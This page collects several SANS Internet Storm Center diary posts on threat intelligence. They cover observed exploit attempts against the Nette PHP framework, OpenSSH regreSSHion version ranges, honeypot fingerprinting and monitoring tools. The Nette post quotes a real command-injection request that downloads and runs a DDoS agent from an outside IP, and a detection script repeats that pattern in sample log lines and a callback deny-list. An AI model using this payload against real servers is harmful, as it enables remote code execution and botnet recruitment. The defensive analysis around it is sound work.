Tag Archives: SANS

Attacks against the "Nette" PHP framework CVE-2020-15227, (Fri, Jul 12th)

This post was originally published on this site

Today, I noticed some exploit attempts against an older vulnerability in the "Nette Framework", CVE-2020-15227 [1].

Nette is a PHP framework that simplifies the development of web applications in PHP. In 2020, an OS command injection vulnerability was found and patched in Nette. As so often with OS command injection, exploitation was rather straightforward. An exploit was released soon after.

Today, I noticed yet another variation of an exploit for CVE-2020-15227:

 /nette.micro/?callback=shell_exec&cmd=cd%20/tmp;wget%20http://199.204.98.254/ohshit.sh;chmod%20777%20ohshit.sh;./ohshit.sh

Even though the exploit is old, and the line above only loads a simple DDoS agent, the agent itself has not been uploaded to VirusTotal yet [2].

The malware was written in Go, and VirusTotal's "Behaviour" analysis does a pretty good job of summarizing the binary.
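To hunt for this pattern in web server logs, here is an added example (not code from the diary or from the Nette project): it parses combined-format access log lines, flags requests to the nette.micro route whose callback parameter names a command-execution PHP function, and decodes the injected cmd. The deny-list, the log layout and the sample lines are assumptions and constructed input.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# PHP functions that run OS commands. A callback= naming one of these on the
# nette.micro route is the CVE-2020-15227 pattern (assumed deny-list; extend it).
DANGEROUS_CALLBACKS = {"shell_exec", "exec", "system", "passthru", "popen", "proc_open"}

# Apache/nginx combined-log layout is assumed: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

def query_params(query):
    """Split on '&' only: ';' is part of the injected command and must survive."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)  # '+' and %20 both decode to space, as in PHP
    return params

def flag_nette_callback(line):
    """Return a finding for a CVE-2020-15227-style request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("uri"))
    if "nette.micro" not in url.path:
        return None
    params = query_params(url.query)
    callback = params.get("callback", "")
    if callback not in DANGEROUS_CALLBACKS:
        return None
    return {"client": m.group("ip"), "time": m.group("ts"), "callback": callback,
            "command": params.get("cmd", ""), "status": int(m.group("status"))}

def scan(lines):
    return [f for f in map(flag_nette_callback, lines) if f]

# Constructed sample lines (not real traffic): one attempt modelled on the request
# quoted above, one benign request, one callback= probe against an unrelated path.
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Jul/2024:10:15:01 +0000] "GET /nette.micro/?callback=shell_exec'
    '&cmd=cd%20/tmp;wget%20http://192.0.2.10/x.sh;chmod%20777%20x.sh;./x.sh HTTP/1.1" 200 512',
    '198.51.100.7 - - [12/Jul/2024:10:15:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 2048',
    '203.0.113.5 - - [12/Jul/2024:10:15:03 +0000] "GET /app/?callback=shell_exec&cmd=id HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):  # a 200 on an unpatched host warrants host triage
        print(finding)
```

The status code is kept in the finding because a 200 response from a host still running a vulnerable Nette version is the case that needs host-level triage, not just blocking the source.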

  • The binary uses crontab and systemd for persistence.
  • It uses sosbot.icu on port 1314 for command and control.

[1] https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94
[2] https://www.virustotal.com/gui/file/8325bfc699f899d0190e36ea339540ea0590aea0e1b22b8a2dcec3ff8b5763b8


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Understanding SSH Honeypot Logs: Attackers Fingerprinting Honeypots, (Thu, Jul 11th)


Some of the commands observed can be confusing for a novice looking at ssh honeypot logs. Sure, you have some obvious commands like "uname -a" to fingerprint the kernel. However, other commands are less intuitive and are not commands a normal user would use. I am trying to summarize some of the more common ones here, focusing on commands attackers use to figure out if they are inside a honeypot.

Kunai: Keep an Eye on your Linux Hosts Activity, (Mon, Jul 8th)


Microsoft has a very popular tool (part of the Sysinternals suite) called Sysmon[1]. It is a system service and device driver designed to monitor and log system activity, including very useful events like process creation, network connections, DNS requests, file changes, and more. This tool is deployed by many organizations because it’s a great companion to expand the visibility of your Windows environments. Many SOCs rely on it to perform investigations and hunting.

Overlooked Domain Name Resiliency Issues: Registrar Communications, (Fri, Jul 5th)


I often think the Internet would work better without DNS. People unable to remember an IP address would be unable to use it. But on the other hand, there is more to DNS than translating a human-readable hostname to a "machine-readable" IP address. DNS does allow us to use consistent labels even as the IP address changes.

SSH "regreSSHion" Remote Code Execution Vulnerability in OpenSSH., (Mon, Jul 1st)


Qualys published a blog post with details regarding a critical remote code execution vulnerability [1].

This week is far from ideal to have to deal with a critical vulnerability in widely used software like OpenSSH. So I want to save you some time by summarizing the most important points in a very brief post:

  • The CVEs associated with this vulnerability are CVE-2006-5051 and CVE-2024-6387.
  • The reason for the two CVE numbers, and the use of the old 2006 CVE number, is that this is a regression: an old vulnerability that came back. Sadly, this happens somewhat regularly (not with OpenSSH, but with software in general) if developers do not add tests to ensure the vulnerability stays patched in future versions. Missing comments are another reason for these regressions: a developer may remove a test they consider unnecessary.
  • The vulnerability does allow arbitrary remote code execution without authentication.
  • OpenSSH versions up to 4.4p1 are vulnerable to CVE-2006-5051.
  • OpenSSH versions from 8.5p1 up to 9.8p1 are affected (9.8p1 is the patched version).
  • Remember that many Linux distributions will not increase version numbers if they are backporting a patch.
  • This is a timing issue, and exploitation is not easily reproducible; it takes about 10,000 attempts on x86 (32-bit).
  • The speed of exploitation is limited by the MaxStartups and LoginGraceTime settings.
  • Exploitation for AMD64 appears to be not practical at this time.

Most Linux systems are currently running on 64-bit architectures. However, this could be a big deal for legacy systems / IoT systems in particular if no more patches are available. Limiting the rate of new connections using a network firewall may make exploitation less likely in these cases. First of all, a patch should be applied. But if no patch is available, port knocking, moving the server to an odd port or allowlisting specific IPs may be an option.
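As an added example, not code from the diary or from Qualys, this Python script classifies OpenSSH version banners against the ranges listed above and reports the two sshd settings the post names as limiting the attempt rate. The banners and configuration text are constructed inputs, and the backport caveat from the list applies to every "affected" result.

```python
import re

# Version ranges as summarized in the post: up to and including 4.4p1
# (CVE-2006-5051), and 8.5p1 up to but not including 9.8p1, the patched
# release (CVE-2024-6387). Versions are compared as (major, minor, portable).
BANNER_RE = re.compile(r"OpenSSH_(\d+)\.(\d+)(?:p(\d+))?")

def parse_openssh_version(banner):
    """Return (major, minor, p) from a banner such as
    'SSH-2.0-OpenSSH_9.6p1 Ubuntu-3ubuntu13', or None if not OpenSSH."""
    m = BANNER_RE.search(banner)
    if not m:
        return None
    major, minor, p = m.groups()
    return (int(major), int(minor), int(p or 0))

def classify(banner):
    """Map a banner to 'CVE-2006-5051', 'CVE-2024-6387',
    'patched-or-unaffected' or 'unknown'. A hit only means 'possibly
    affected': distributions backport fixes without bumping the version,
    so confirm against the package changelog before acting."""
    v = parse_openssh_version(banner)
    if v is None:
        return "unknown"
    if v <= (4, 4, 1):
        return "CVE-2006-5051"
    if (8, 5, 1) <= v < (9, 8, 1):
        return "CVE-2024-6387"
    return "patched-or-unaffected"

def grace_and_startups(sshd_config_text):
    """Report the two sshd settings the post names as bounding the attempt
    rate; sshd's defaults (120 seconds, 10:30:100) apply when absent."""
    settings = {"LoginGraceTime": "120", "MaxStartups": "10:30:100"}
    for raw in sshd_config_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        key, value = (re.split(r"[\s=]+", line, maxsplit=1) + [""])[:2]
        for name in settings:  # sshd keywords are case-insensitive
            if key.lower() == name.lower():
                settings[name] = value.strip()
    return settings

if __name__ == "__main__":
    # Constructed inputs, not taken from a real host.
    for b in ("SSH-2.0-OpenSSH_9.6p1 Ubuntu-3ubuntu13", "SSH-2.0-OpenSSH_9.8p1"):
        print(b, "->", classify(b))
    print(grace_and_startups("LoginGraceTime 30\nMaxStartups 10:30:60\n"))
```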


[1] https://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu


Sysinternals' Process Monitor Version 4 Released, (Sat, Jun 22nd)


Version 4.01 of Sysinternals' Process Monitor (procmon) was released (just one day after the release of version 4.0).

These releases bring improvements to performance and the user interface.

And a new event for the Process start was added.

This can now be displayed as a column:

And it can also be used as a filter, for example to filter out all processes that started before the new process you want to analyze:

Didier Stevens
Senior handler
blog.DidierStevens.com
